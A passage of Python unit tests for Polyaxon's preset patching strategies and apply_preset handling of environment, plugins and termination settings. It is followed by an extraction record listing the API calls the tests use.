"matrix": None,
"dependencies": [],
"trigger": None,
"conditions": None,
"skipOnUpstreamSkip": None,
}
)
def test_patch_replace_empty_values_with_empty_preset(self):
operation = self.get_empty_operation()
tmp_operation = self.get_empty_operation()
result = tmp_operation.patch(
V1Operation(is_preset=True), strategy=V1PatchStrategy.REPLACE
)
assert result.to_dict() == operation.to_dict()
tmp_operation = self.get_empty_operation()
preset = self.get_empty_preset()
result = tmp_operation.patch(preset, strategy=V1PatchStrategy.REPLACE)
result_dict = result.to_dict()
assert result_dict.pop("hubRef") == operation.hub_ref
expected = preset.to_dict()
expected.pop("isPreset")
assert result_dict == expected
def test_patch_replace_empty_values_with_full_preset(self):
operation = self.get_empty_operation()
tmp_operation = self.get_empty_operation()
preset = self.get_full_preset()
result = tmp_operation.patch(preset, strategy=V1PatchStrategy.REPLACE)
result_dict = result.to_dict()
assert result_dict.pop("hubRef") == operation.hub_ref
expected = preset.to_dict()
expected.pop("isPreset")
assert result_dict == expected
def test_patch_replace_full_values_with_empty_preset(self):
operation = self.get_full_operation()
tmp_operation = self.get_full_operation()
result = tmp_operation.patch(
V1Operation(is_preset=True), strategy=V1PatchStrategy.REPLACE
)
assert result.to_dict() == operation.to_dict()
tmp_operation = self.get_full_operation()
preset = self.get_empty_preset()
result = tmp_operation.patch(preset, strategy=V1PatchStrategy.REPLACE)
result_dict = result.to_dict()
assert result_dict.pop("hubRef") == operation.hub_ref
assert result_dict.pop("name") == operation.name
assert result_dict.pop("trigger") == operation.trigger
assert result_dict.pop("conditions") == operation.conditions
assert result_dict.pop("skipOnUpstreamSkip") == operation.skip_on_upstream_skip
assert result_dict.pop("schedule") == operation.schedule.to_dict()
assert result_dict.pop("conditions", None) is None
assert result_dict.pop("matrix") == operation.matrix.to_dict()
assert result_dict.pop("cache") == operation.cache.to_dict()
assert result_dict.pop("plugins") == operation.plugins.to_dict()
assert result_dict.pop("termination") == operation.termination.to_dict()
assert result_dict.pop("build", None) is not None
expected = preset.to_dict()
expected.pop("isPreset")
expected.pop("cache")
expected.pop("plugins")
expected.pop("termination")
assert result_dict == expected
def test_patch_replace_full_values_with_full_preset(self):
operation = self.get_full_operation()
tmp_operation = self.get_full_operation()
preset = self.get_full_preset()
result = tmp_operation.patch(preset, strategy=V1PatchStrategy.REPLACE)
result_dict = result.to_dict()
assert result_dict.pop("hubRef") == operation.hub_ref
expected = preset.to_dict()
expected.pop("isPreset")
assert result_dict == expected
def test_patch_isnull_empty_values_with_empty_preset(self):
operation = self.get_empty_operation()
tmp_operation = self.get_empty_operation()
result = tmp_operation.patch(
V1Operation(is_preset=True), strategy=V1PatchStrategy.ISNULL
)
assert result.to_dict() == operation.to_dict()
tmp_operation = self.get_empty_operation()
preset = self.get_empty_preset()
result = tmp_operation.patch(preset, strategy=V1PatchStrategy.ISNULL)
result_dict = result.to_dict()
assert result_dict.pop("hubRef") == operation.hub_ref
expected = preset.to_dict()
expected.pop("isPreset")
assert result_dict == expected
def test_patch_isnull_empty_values_with_full_preset(self):
operation = self.get_empty_operation()
tmp_operation = self.get_empty_operation()
result = tmp_operation.patch(
V1Operation(is_preset=True), strategy=V1PatchStrategy.ISNULL
)
assert result.to_dict() == operation.to_dict()
tmp_operation = self.get_empty_operation()
preset = self.get_empty_preset()
result = tmp_operation.patch(preset, strategy=V1PatchStrategy.ISNULL)
result_dict = result.to_dict()
assert result_dict.pop("hubRef") == operation.hub_ref
expected = preset.to_dict()
expected.pop("isPreset")
assert result_dict == expected
def test_patch_isnull_full_values_with_empty_preset(self):
operation = self.get_full_operation()
tmp_operation = self.get_full_operation()
result = tmp_operation.patch(
V1Operation(is_preset=True), strategy=V1PatchStrategy.ISNULL
)
assert result.to_dict() == operation.to_dict()
tmp_operation = self.get_full_operation()
preset = self.get_empty_preset()
result = tmp_operation.patch(preset, strategy=V1PatchStrategy.ISNULL)
assert result.to_dict() == operation.to_dict()
def test_patch_isnull_full_values_with_full_preset(self):
operation = self.get_full_operation()
tmp_operation = self.get_full_operation()
preset = self.get_full_preset()
result = tmp_operation.patch(preset, strategy=V1PatchStrategy.ISNULL)
assert result.to_dict() == operation.to_dict()
def test_patch_post_merge_empty_values_with_empty_preset(self):
operation = self.get_empty_operation()
tmp_operation = self.get_empty_operation()
result = tmp_operation.patch(
V1Operation(is_preset=True), strategy=V1PatchStrategy.POST_MERGE
)
assert result.to_dict() == operation.to_dict()
tmp_operation = self.get_empty_operation()
preset = self.get_empty_preset()
result = tmp_operation.patch(preset, strategy=V1PatchStrategy.POST_MERGE)
result_dict = result.to_dict()
assert result_dict.pop("hubRef") == operation.hub_ref
expected = preset.to_dict()
expected.pop("isPreset")
assert result_dict == expected
def test_patch_post_merge_empty_values_with_full_preset(self):
operation = self.get_empty_operation()
tmp_operation = self.get_empty_operation()
preset = self.get_full_preset()
result = tmp_operation.patch(preset, strategy=V1PatchStrategy.POST_MERGE)
result_dict = result.to_dict()
assert result_dict.pop("hubRef") == operation.hub_ref
expected = preset.to_dict()
expected.pop("isPreset")
assert result_dict == expected
def test_patch_post_merge_full_values_with_empty_preset(self):
operation = self.get_full_operation()
tmp_operation = self.get_full_operation()
result = tmp_operation.patch(
V1Operation(is_preset=True), strategy=V1PatchStrategy.POST_MERGE
)
assert result.to_dict() == operation.to_dict()
tmp_operation = self.get_full_operation()
preset = self.get_empty_preset()
result = tmp_operation.patch(preset, strategy=V1PatchStrategy.POST_MERGE)
result_dict = result.to_dict()
assert result_dict["description"] == ""
result_dict["description"] = self.DEFAULT_STR_VALUE
assert result_dict["queue"] == ""
result_dict["queue"] = "{}/{}".format(
self.DEFAULT_STR_VALUE, self.DEFAULT_STR_VALUE
)
result_dict["presets"] = [self.DEFAULT_STR_VALUE]
# Since there's no component to validate the runPatch section it stays the same
assert result_dict == operation.to_dict()
operation = self.get_full_operation_with_component()
tmp_operation = self.get_full_operation_with_component()
preset = self.get_empty_preset()
result = tmp_operation.patch(preset, strategy=V1PatchStrategy.POST_MERGE)
result_dict = result.to_dict()
assert result_dict["description"] == ""
result_dict["description"] = self.DEFAULT_STR_VALUE
assert result_dict["queue"] == ""
result_dict["queue"] = "{}/{}".format(
self.DEFAULT_STR_VALUE, self.DEFAULT_STR_VALUE
)
# Run patch was validated and merged
assert result_dict["runPatch"]["environment"]["serviceAccountName"] == ""
result_dict["runPatch"]["environment"][
"serviceAccountName"
] = operation.run_patch["environment"]["serviceAccountName"]
assert result_dict["runPatch"]["container"].pop("name") == MAIN_JOB_CONTAINER
assert result_dict == operation.to_dict()
def test_patch_post_merge_full_values_with_full_preset(self):
operation = self.get_full_operation()
tmp_operation = self.get_full_operation()
preset = self.get_full_preset()
expected = preset.to_dict()
result = tmp_operation.patch(preset, strategy=V1PatchStrategy.POST_MERGE)
result_dict = result.to_dict()
expected.pop("isPreset")
expected["tags"] = operation.tags + expected["tags"]
expected["presets"] = operation.presets + expected["presets"]
expected["hooks"] = [i.to_dict() for i in operation.hooks] + expected["hooks"]
expected["dependencies"] = operation.dependencies + expected["dependencies"]
expected["events"] = [i.to_dict() for i in operation.events] + expected[
"events"
]
expected["joins"] = [i.to_dict() for i in operation.joins] + expected["joins"]
expected["matrix"]["values"] = (
operation.matrix.values + expected["matrix"]["values"]
)
# Since there's no component to validate the runPatch section it stays the same
expected["runPatch"] = operation.run_patch
assert result_dict.pop("hubRef") == operation.hub_ref
assert result_dict == expected
operation = self.get_full_operation_with_component()
tmp_operation = self.get_full_operation_with_component()
preset = self.get_full_preset()
expected = preset.to_dict()
result = tmp_operation.patch(preset, strategy=V1PatchStrategy.POST_MERGE)
result_dict = result.to_dict()
expected.pop("isPreset")
expected["tags"] = operation.tags + expected["tags"]
expected["presets"] = operation.presets + expected["presets"]
expected["hooks"] = [i.to_dict() for i in operation.hooks] + expected["hooks"]
expected["dependencies"] = operation.dependencies + expected["dependencies"]
expected["events"] = [i.to_dict() for i in operation.events] + expected[
"events"
]
expected["joins"] = [i.to_dict() for i in operation.joins] + expected["joins"]
expected["matrix"]["values"] = (
operation.matrix.values + expected["matrix"]["values"]
)
# Run patch was validated and merged
assert result_dict["runPatch"]["container"].pop("name") == MAIN_JOB_CONTAINER
assert (
result_dict["runPatch"]["connections"]
== operation.run_patch["connections"] + expected["runPatch"]["connections"]
)
result_dict["runPatch"]["connections"] = expected["runPatch"]["connections"]
assert (
result_dict["runPatch"]["init"]
== operation.run_patch["init"] + expected["runPatch"]["init"]
)
result_dict["runPatch"]["init"] = expected["runPatch"]["init"]
assert (
result_dict["runPatch"]["environment"]["imagePullSecrets"]
== operation.run_patch["environment"]["imagePullSecrets"]
+ expected["runPatch"]["environment"]["imagePullSecrets"]
)
result_dict["runPatch"]["environment"]["imagePullSecrets"] = expected[
"runPatch"
]["environment"]["imagePullSecrets"]
assert result_dict["runPatch"]["environment"]["nodeSelector"] == {
**operation.run_patch["environment"]["nodeSelector"],
**expected["runPatch"]["environment"]["nodeSelector"],
}
result_dict["runPatch"]["environment"]["nodeSelector"] = expected["runPatch"][
"environment"
]["nodeSelector"]
assert result_dict.pop("hubRef") == operation.hub_ref
assert result_dict.pop("component") == operation.component.to_dict()
expected["runPatch"]["container"].pop("name")
assert result_dict == expected
def test_patch_pre_merge_empty_values_with_empty_preset(self):
operation = self.get_empty_operation()
tmp_operation = self.get_empty_operation()
result = tmp_operation.patch(
V1Operation(is_preset=True), strategy=V1PatchStrategy.PRE_MERGE
)
assert result.to_dict() == operation.to_dict()
tmp_operation = self.get_empty_operation()
preset = self.get_empty_preset()
result = tmp_operation.patch(preset, strategy=V1PatchStrategy.PRE_MERGE)
result_dict = result.to_dict()
assert result_dict.pop("hubRef") == operation.hub_ref
expected = preset.to_dict()
expected.pop("isPreset")
assert result_dict == expected
def test_patch_pre_merge_empty_values_with_full_preset(self):
operation = self.get_empty_operation()
tmp_operation = self.get_empty_operation()
preset = self.get_full_preset()
result = tmp_operation.patch(preset, strategy=V1PatchStrategy.PRE_MERGE)
result_dict = result.to_dict()
assert result_dict.pop("hubRef") == operation.hub_ref
expected = preset.to_dict()
expected.pop("isPreset")
assert result_dict == expected
def test_patch_pre_merge_full_values_with_empty_preset(self):
operation = self.get_full_operation()
tmp_operation = self.get_full_operation()
result = tmp_operation.patch(
V1Operation(is_preset=True), strategy=V1PatchStrategy.PRE_MERGE
)
assert result.to_dict() == operation.to_dict()
tmp_operation = self.get_full_operation()
preset = self.get_empty_preset()
result = tmp_operation.patch(preset, strategy=V1PatchStrategy.PRE_MERGE)
result_dict = result.to_dict()
# Since there's no component to validate the runPatch section it stays the same
assert result_dict == operation.to_dict()
operation = self.get_full_operation_with_component()
tmp_operation = self.get_full_operation_with_component()
preset = self.get_empty_preset()
result = tmp_operation.patch(preset, strategy=V1PatchStrategy.PRE_MERGE)
result_dict = result.to_dict()
assert result_dict["runPatch"]["container"].pop("name") == MAIN_JOB_CONTAINER
# Run patch was validated and merged
assert result_dict == operation.to_dict()
def test_patch_pre_merge_full_values_with_full_preset(self):
operation = self.get_full_operation()
tmp_operation = self.get_full_operation()
preset = self.get_full_preset()
preset_dict = preset.to_dict()
expected = operation.to_dict()
result = tmp_operation.patch(preset, strategy=V1PatchStrategy.PRE_MERGE)
result_dict = result.to_dict()
expected["tags"] = preset_dict["tags"] + operation.tags
expected["presets"] = preset_dict["presets"] + operation.presets
expected["hooks"] = preset_dict["hooks"] + [
i.to_dict() for i in operation.hooks
]
expected["dependencies"] = preset_dict["dependencies"] + operation.dependencies
expected["events"] = preset_dict["events"] + [
i.to_dict() for i in operation.events
]
expected["joins"] = preset_dict["joins"] + [
i.to_dict() for i in operation.joins
]
expected["matrix"]["values"] = (
preset_dict["matrix"]["values"] + operation.matrix.values
)
assert result_dict == expected
operation = self.get_full_operation_with_component()
tmp_operation = self.get_full_operation_with_component()
preset = self.get_full_preset()
preset_dict = preset.to_dict()
expected = operation.to_dict()
result = tmp_operation.patch(preset, strategy=V1PatchStrategy.PRE_MERGE)
result_dict = result.to_dict()
expected["tags"] = preset_dict["tags"] + operation.tags
expected["presets"] = preset_dict["presets"] + operation.presets
expected["hooks"] = preset_dict["hooks"] + [
i.to_dict() for i in operation.hooks
]
expected["dependencies"] = preset_dict["dependencies"] + operation.dependencies
expected["events"] = preset_dict["events"] + [
i.to_dict() for i in operation.events
]
expected["joins"] = preset_dict["joins"] + [
i.to_dict() for i in operation.joins
]
expected["matrix"]["values"] = (
preset_dict["matrix"]["values"] + operation.matrix.values
)
# Run patch was validated and merged
assert result_dict["runPatch"]["container"].pop("name") == MAIN_JOB_CONTAINER
assert result_dict["runPatch"]["container"].pop("resources") == deep_update(
preset_dict["runPatch"]["container"]["resources"],
expected["runPatch"]["container"]["resources"],
)
result_dict["runPatch"]["container"]["resources"] = expected["runPatch"][
"container"
]["resources"]
assert (
result_dict["runPatch"]["connections"]
== preset_dict["runPatch"]["connections"]
+ expected["runPatch"]["connections"]
)
result_dict["runPatch"]["connections"] = expected["runPatch"]["connections"]
assert (
result_dict["runPatch"]["init"]
== preset_dict["runPatch"]["init"] + expected["runPatch"]["init"]
)
result_dict["runPatch"]["init"] = expected["runPatch"]["init"]
assert (
result_dict["runPatch"]["environment"]["imagePullSecrets"]
== preset_dict["runPatch"]["environment"]["imagePullSecrets"]
+ expected["runPatch"]["environment"]["imagePullSecrets"]
)
result_dict["runPatch"]["environment"]["imagePullSecrets"] = expected[
"runPatch"
]["environment"]["imagePullSecrets"]
assert result_dict["runPatch"]["environment"]["nodeSelector"] == {
**preset_dict["runPatch"]["environment"]["nodeSelector"],
**expected["runPatch"]["environment"]["nodeSelector"],
}
result_dict["runPatch"]["environment"]["nodeSelector"] = expected["runPatch"][
"environment"
]["nodeSelector"]
assert result_dict == expected
class BaseTestApplyPreset(BaseTestCase):
def setUp(self):
super().setUp()
op_spec = OperationSpecification.read(
{
"version": 1.1,
"kind": "operation",
"name": "foo",
"description": "a description",
"tags": ["tag1", "tag2"],
"trigger": "all_succeeded",
"component": {
"name": "build-template",
"tags": ["tag1", "tag2"],
"run": {
"kind": V1RunKind.JOB,
"container": {"image": "test"},
"init": [{"connection": "foo", "git": {"revision": "dev"}}],
},
},
}
)
self.compiled_operation = OperationSpecification.compile_operation(op_spec)
self.preset = {"runPatch": {}, "patchStrategy": V1PatchStrategy.POST_MERGE}
@pytest.mark.polyaxonfile_mark
class TestApplyPresetEnvironment(BaseTestApplyPreset):
def assert_environment(self, environment1, environment2):
self.preset["runPatch"]["environment"] = environment1
assert self.compiled_operation.run.environment is None
assert (
OperationSpecification.apply_preset(
config=self.compiled_operation,
preset=self.preset,
)
== self.compiled_operation
)
assert self.compiled_operation.run.environment is not None
env = self.compiled_operation.run.environment.to_dict()
assert env == environment1
# Updating the preset
self.preset["patchStrategy"] = V1PatchStrategy.REPLACE
self.preset["runPatch"]["environment"] = environment2
assert (
OperationSpecification.apply_preset(
config=self.compiled_operation,
preset=self.preset,
)
== self.compiled_operation
)
assert self.compiled_operation.run.environment is not None
env = self.compiled_operation.run.environment.to_dict()
assert env == environment2
def test_compile_injects_labels(self):
environment1 = {"labels": {"label1": "value1"}}
environment2 = {"labels": {"label1": "value11"}}
self.assert_environment(environment1, environment2)
# Updating the preset
environment3 = {"labels": {"label2": "value2"}}
self.preset["runPatch"]["environment"] = environment3
env = self.compiled_operation.run.environment.to_dict()
assert env == environment2
assert (
OperationSpecification.apply_preset(
config=self.compiled_operation,
preset=self.preset,
)
== self.compiled_operation
)
assert self.compiled_operation.run.environment is not None
env = self.compiled_operation.run.environment.to_dict()
assert env == {"labels": {"label2": "value2"}}
def test_compile_injects_annotations(self):
environment1 = {"annotations": {"anno1": "value1"}}
environment2 = {"annotations": {"anno1": "value11"}}
self.assert_environment(environment1, environment2)
# Updating the preset
environment3 = {"annotations": {"anno2": "value2"}}
self.preset["runPatch"]["environment"] = environment3
assert (
OperationSpecification.apply_preset(
config=self.compiled_operation,
preset=self.preset,
)
== self.compiled_operation
)
assert self.compiled_operation.run.environment is not None
env = self.compiled_operation.run.environment.to_dict()
assert env == {"annotations": {"anno2": "value2"}}
def test_compile_injects_node_selector(self):
environment1 = {"nodeSelector": {"plx": "selector1"}}
environment2 = {"nodeSelector": {"plx": "selector2"}}
self.assert_environment(environment1, environment2)
def test_compile_injects_affinity(self):
environment1 = {"affinity": {"podAffinity": {}}}
environment2 = {"affinity": {"podAffinity": {"foo": "bar"}}}
self.assert_environment(environment1, environment2)
def test_compile_injects_tolerations(self):
environment1 = {"tolerations": [{"key": "key1", "operator": "Exists"}]}
environment2 = {"tolerations": [{"key": "key2", "operator": "NotExists"}]}
self.assert_environment(environment1, environment2)
def test_compile_injects_service_account_name(self):
environment1 = {"serviceAccountName": "sa1"}
environment2 = {"serviceAccountName": "sa2"}
self.assert_environment(environment1, environment2)
def test_compile_injects_image_pull_secrets(self):
environment1 = {"imagePullSecrets": ["ps1", "ps2"]}
environment2 = {"imagePullSecrets": ["ps3"]}
self.assert_environment(environment1, environment2)
def test_compile_injects_security_context(self):
environment1 = {"securityContext": {"runAsUser": 1000, "runAsGroup": 3000}}
environment2 = {"securityContext": {"runAsUser": 100, "runAsGroup": 300}}
self.assert_environment(environment1, environment2)
@pytest.mark.polyaxonfile_mark
class TestApplyPresetPlugins(BaseTestApplyPreset):
def assert_plugins(self, plugins1, plugins2):
self.preset["plugins"] = plugins1
assert self.compiled_operation.plugins is None
assert (
OperationSpecification.apply_preset(
config=self.compiled_operation,
preset=self.preset,
)
== self.compiled_operation
)
assert self.compiled_operation.plugins is not None
env = self.compiled_operation.plugins.to_dict()
assert env == plugins1
# Updating the preset
self.preset["plugins"] = plugins2
plugins = self.compiled_operation.plugins.to_dict()
assert plugins == plugins1
assert (
OperationSpecification.apply_preset(
config=self.compiled_operation,
preset=self.preset,
)
== self.compiled_operation
)
assert self.compiled_operation.plugins is not None
plugins = self.compiled_operation.plugins.to_dict()
assert plugins == plugins2
def test_compile_injects_log_level(self):
plugins = {"logLevel": "DEBUG"}
plugins2 = {"logLevel": "INFO"}
self.assert_plugins(plugins, plugins2)
def test_compile_injects_auth(self):
plugins = {"auth": True}
plugins2 = {"auth": False}
self.assert_plugins(plugins, plugins2)
def test_compile_injects_docker(self):
plugins = {"docker": True}
plugins2 = {"docker": False}
self.assert_plugins(plugins, plugins2)
def test_compile_injects_shm(self):
plugins = {"shm": True}
plugins2 = {"shm": False}
self.assert_plugins(plugins, plugins2)
@pytest.mark.polyaxonfile_mark
class TestApplyPresetTermination(BaseTestApplyPreset):
def assert_termination(self, termination1, termination2):
self.preset["termination"] = termination1
assert self.compiled_operation.termination is None
assert (
OperationSpecification.apply_preset(
config=self.compiled_operation,
preset=self.preset,
)
== self.compiled_operation
)
assert self.compiled_operation.termination is not None
assert self.compiled_operation.termination.to_dict() == termination1
# Updating the preset
self.preset["termination"] = termination2
assert self.compiled_operation.termination.to_dict() == termination1
assert (
OperationSpecification.apply_preset(
config=self.compiled_operation,
preset=self.preset,
)
== self.compiled_operation
)
assert self.compiled_operation.termination is not None
assert self.compiled_operation.termination.to_dict() == termination2
def test_compile_injects_max_retries(self):
termination1 = {"maxRetries": 10}
termination2 = {"maxRetries": 1}
self.assert_termination(termination1, termination2)
def test_compile_injects_timeout(self):
termination1 = {"timeout": 10}
termination2 = {"timeout": 1}
self.assert_termination(termination1, termination2)
def test_compile_injects_ttl(self):
termination1 = {"ttl": 10}
termination2 = {"ttl": 1}
self.assert_termination(termination1, termination2)
@pytest.mark.polyaxonfile_mark
class TestApplyPreset(BaseTestApplyPreset):
def test_patch_does_not_alter_with_no_preset(self):
assert (
OperationSpecification.apply_preset(
config=self.compiled_operation,
preset=None,
)
== self.compiled_operation
)
def test_patch_does_not_alter_with_preset_with_no_environment_or_contexts_or_termination(
self,
):
assert (
OperationSpecification.apply_preset(
config=self.compiled_operation,
preset=self.preset,
)
== self.compiled_operation
)
def test_patch_environment_and_termination(self):
termination1 = {"maxRetries": 1, "timeout": 1, "ttl": 1}
environment1 = {
"labels": {"label1": "value1"},
"annotations": {"anno1": "value1"},
"nodeSelector": {"plx": "selector1"},
"affinity": {"podAffinity": {}},
"tolerations": [{"key": "key1", "operator": "Exists"}],
"serviceAccountName": "sa1",
"imagePullSecrets": ["ps1", "ps2"],
"securityContext": {"runAsUser": 1000, "runAsGroup": 3000},
}
plugins1 = {
"logLevel": "DEBUG",
"auth": True,
"docker": True,
"shm": True,
}
self.preset["termination"] = termination1
self.preset["runPatch"]["environment"] = environment1
self.preset["plugins"] = plugins1
assert self.compiled_operation.termination is None
assert (
OperationSpecification.apply_preset(
config=self.compiled_operation,
preset=self.preset,
)
== self.compiled_operation
)
assert self.compiled_operation.termination is not None
assert self.compiled_operation.termination.to_dict() == termination1
assert self.compiled_operation.run.environment is not None
env = self.compiled_operation.run.environment.to_dict()
assert env == environment1
assert self.compiled_operation.plugins is not None
assert self.compiled_operation.plugins.to_dict() == plugins1
termination2 = {"maxRetries": 10, "timeout": 10, "ttl": 10}
environment2 = {
"labels": {"label1": "value12"},
"annotations": {"anno1": "value12"},
"nodeSelector": {"plx": "selector12"},
"affinity": {"podAffinity": {"k": "v"}},
"tolerations": [{"key": "key11", "operator": "NotExists"}],
"serviceAccountName": "sa2",
"imagePullSecrets": ["ps2", "ps22"],
"securityContext": {"runAsUser": 100, "runAsGroup": 300},
}
plugins2 = {
"logLevel": "INFO",
"auth": False,
"docker": False,
"shm": False,
}
# Updating the preset
self.preset["termination"] = termination2
self.preset["runPatch"]["environment"] = environment2
self.preset["plugins"] = plugins2
self.preset["patchStrategy"] = V1PatchStrategy.REPLACE
assert (
OperationSpecification.apply_preset(
config=self.compiled_operation,
preset=self.preset,
)
== self.compiled_operation
)
assert self.compiled_operation.termination is not None
assert self.compiled_operation.termination.to_dict() == termination2
assert self.compiled_operation.termination is not None
env = self.compiled_operation.run.environment.to_dict()
assert env == environment2
assert self.compiled_operation.plugins is not None
assert self.compiled_operation.plugins.to_dict() == plugins2
termination3 = {"maxRetries": 15}
environment3 = {
"labels": {},
"annotations": {},
"nodeSelector": {},
"affinity": {"podAffinity": {"k": "v"}},
"tolerations": [],
"securityContext": {"runAsUser": 10, "runAsGroup": 30},
"serviceAccountName": "sa2",
"imagePullSecrets": ["ps2", "ps22"],
}
# Updating the preset
self.preset["termination"] = termination3
self.preset["runPatch"]["environment"] = environment3
self.preset["patchStrategy"] = V1PatchStrategy.REPLACE
assert (
OperationSpecification.apply_preset(
config=self.compiled_operation,
preset=self.preset,
)
== self.compiled_operation
)
assert self.compiled_operation.termination is not None
assert self.compiled_operation.termination.to_dict() == {
"maxRetries": 15,
"timeout": 10,
"ttl": 10,
}
assert self.compiled_operation.termination is not None
env = self.compiled_operation.run.environment.to_dict()
assert env == environment3
assert self.compiled_operation.plugins is not None
assert self.compiled_operation.plugins.to_dict() == plugins2
|
[
"polyaxon.utils.tz_utils.now",
"polyaxon.polyflow.V1Operation",
"polyaxon.polyaxonfile.OperationSpecification.compile_operation",
"polyaxon.config_reader.utils.deep_update",
"polyaxon.polyaxonfile.OperationSpecification.apply_preset",
"polyaxon.polyflow.V1Component.from_dict",
"polyaxon.polyaxonfile.OperationSpecification.read"
] |
[((1356, 1434), 'polyaxon.polyaxonfile.OperationSpecification.read', 'OperationSpecification.read', (["{'version': pkg.SCHEMA_VERSION, 'hubRef': 'test'}"], {}), "({'version': pkg.SCHEMA_VERSION, 'hubRef': 'test'})\n", (1383, 1434), False, 'from polyaxon.polyaxonfile import OperationSpecification\n'), ((7432, 7466), 'polyaxon.polyflow.V1Component.from_dict', 'V1Component.from_dict', (['config_dict'], {}), '(config_dict)\n', (7453, 7466), False, 'from polyaxon.polyflow import V1Component, V1EventKind, V1Operation, V1RunKind\n'), ((12807, 13370), 'polyaxon.polyaxonfile.OperationSpecification.read', 'OperationSpecification.read', (["{'version': pkg.SCHEMA_VERSION, 'name': None, 'isPreset': True,\n 'description': '', 'tags': [], 'presets': [], 'queue': '', 'cache': {},\n 'termination': {}, 'plugins': {}, 'build': None, 'hooks': [], 'params':\n {}, 'runPatch': {'init': [], 'connections': [], 'container': {},\n 'environment': {'nodeSelector': {}, 'serviceAccountName': '',\n 'imagePullSecrets': []}}, 'schedule': None, 'events': [], 'joins': [],\n 'matrix': None, 'dependencies': [], 'trigger': None, 'conditions': None,\n 'skipOnUpstreamSkip': None}"], {}), "({'version': pkg.SCHEMA_VERSION, 'name': None,\n 'isPreset': True, 'description': '', 'tags': [], 'presets': [], 'queue':\n '', 'cache': {}, 'termination': {}, 'plugins': {}, 'build': None,\n 'hooks': [], 'params': {}, 'runPatch': {'init': [], 'connections': [],\n 'container': {}, 'environment': {'nodeSelector': {},\n 'serviceAccountName': '', 'imagePullSecrets': []}}, 'schedule': None,\n 'events': [], 'joins': [], 'matrix': None, 'dependencies': [],\n 'trigger': None, 'conditions': None, 'skipOnUpstreamSkip': None})\n", (12834, 13370), False, 'from polyaxon.polyaxonfile import OperationSpecification\n'), ((32975, 33355), 'polyaxon.polyaxonfile.OperationSpecification.read', 'OperationSpecification.read', (["{'version': 1.1, 'kind': 'operation', 'name': 'foo', 'description':\n 'a description', 'tags': ['tag1', 'tag2'], 'trigger': 'all_succeeded',\n 'component': {'name': 'build-template', 'tags': ['tag1', 'tag2'], 'run':\n {'kind': V1RunKind.JOB, 'container': {'image': 'test'}, 'init': [{\n 'connection': 'foo', 'git': {'revision': 'dev'}}]}}}"], {}), "({'version': 1.1, 'kind': 'operation', 'name':\n 'foo', 'description': 'a description', 'tags': ['tag1', 'tag2'],\n 'trigger': 'all_succeeded', 'component': {'name': 'build-template',\n 'tags': ['tag1', 'tag2'], 'run': {'kind': V1RunKind.JOB, 'container': {\n 'image': 'test'}, 'init': [{'connection': 'foo', 'git': {'revision':\n 'dev'}}]}}})\n", (33002, 33355), False, 'from polyaxon.polyaxonfile import OperationSpecification\n'), ((33692, 33741), 'polyaxon.polyaxonfile.OperationSpecification.compile_operation', 'OperationSpecification.compile_operation', (['op_spec'], {}), '(op_spec)\n', (33732, 33741), False, 'from polyaxon.polyaxonfile import OperationSpecification\n'), ((1162, 1167), 'polyaxon.utils.tz_utils.now', 'now', ([], {}), '()\n', (1165, 1167), False, 'from polyaxon.utils.tz_utils import now\n'), ((1257, 1262), 'polyaxon.utils.tz_utils.now', 'now', ([], {}), '()\n', (1260, 1262), False, 'from polyaxon.utils.tz_utils import now\n'), ((14140, 14167), 'polyaxon.polyflow.V1Operation', 'V1Operation', ([], {'is_preset': '(True)'}), '(is_preset=True)\n', (14151, 14167), False, 'from polyaxon.polyflow import V1Component, V1EventKind, V1Operation, V1RunKind\n'), ((15350, 15377), 'polyaxon.polyflow.V1Operation', 'V1Operation', ([], {'is_preset': '(True)'}), '(is_preset=True)\n', (15361, 15377), False, 'from polyaxon.polyflow import V1Component, V1EventKind, V1Operation, V1RunKind\n'), ((17419, 17446), 'polyaxon.polyflow.V1Operation', 'V1Operation', ([], {'is_preset': '(True)'}), '(is_preset=True)\n', (17430, 17446), False, 'from polyaxon.polyflow import V1Component, V1EventKind, V1Operation, V1RunKind\n'), ((18137, 18164), 'polyaxon.polyflow.V1Operation', 'V1Operation', ([], {'is_preset': '(True)'}), '(is_preset=True)\n', (18148, 18164), False, 'from polyaxon.polyflow import V1Component, V1EventKind, V1Operation, V1RunKind\n'), ((18853, 18880), 'polyaxon.polyflow.V1Operation', 'V1Operation', ([], {'is_preset': '(True)'}), '(is_preset=True)\n', (18864, 18880), False, 'from polyaxon.polyflow import V1Component, V1EventKind, V1Operation, V1RunKind\n'), ((19753, 19780), 'polyaxon.polyflow.V1Operation', 'V1Operation', ([], {'is_preset': '(True)'}), '(is_preset=True)\n', (19764, 19780), False, 'from polyaxon.polyflow import V1Component, V1EventKind, V1Operation, V1RunKind\n'), ((20978, 21005), 'polyaxon.polyflow.V1Operation', 'V1Operation', ([], {'is_preset': '(True)'}), '(is_preset=True)\n', (20989, 21005), False, 'from polyaxon.polyflow import V1Component, V1EventKind, V1Operation, V1RunKind\n'), ((26771, 26798), 'polyaxon.polyflow.V1Operation', 'V1Operation', ([], {'is_preset': '(True)'}), '(is_preset=True)\n', (26782, 26798), False, 'from polyaxon.polyflow import V1Component, V1EventKind, V1Operation, V1RunKind\n'), ((27991, 28018), 'polyaxon.polyflow.V1Operation', 'V1Operation', ([], {'is_preset': '(True)'}), '(is_preset=True)\n', (28002, 28018), False, 'from polyaxon.polyflow import V1Component, V1EventKind, V1Operation, V1RunKind\n'), ((31316, 31431), 'polyaxon.config_reader.utils.deep_update', 'deep_update', (["preset_dict['runPatch']['container']['resources']", "expected['runPatch']['container']['resources']"], {}), "(preset_dict['runPatch']['container']['resources'], expected[\n 'runPatch']['container']['resources'])\n", (31327, 31431), False, 'from polyaxon.config_reader.utils import deep_update\n'), ((34130, 34222), 'polyaxon.polyaxonfile.OperationSpecification.apply_preset', 'OperationSpecification.apply_preset', ([], {'config': 'self.compiled_operation', 'preset': 'self.preset'}), '(config=self.compiled_operation, preset=\n self.preset)\n', (34165, 34222), False, 'from polyaxon.polyaxonfile import OperationSpecification\n'), ((34665, 34757), 'polyaxon.polyaxonfile.OperationSpecification.apply_preset', 'OperationSpecification.apply_preset', ([], {'config': 'self.compiled_operation', 'preset': 'self.preset'}), '(config=self.compiled_operation, preset=\n self.preset)\n', (34700, 34757), False, 'from polyaxon.polyaxonfile import OperationSpecification\n'), ((35509, 35601), 'polyaxon.polyaxonfile.OperationSpecification.apply_preset', 'OperationSpecification.apply_preset', ([], {'config': 'self.compiled_operation', 'preset': 'self.preset'}), '(config=self.compiled_operation, preset=\n self.preset)\n', (35544, 35601), False, 'from polyaxon.polyaxonfile import OperationSpecification\n'), ((36291, 36383), 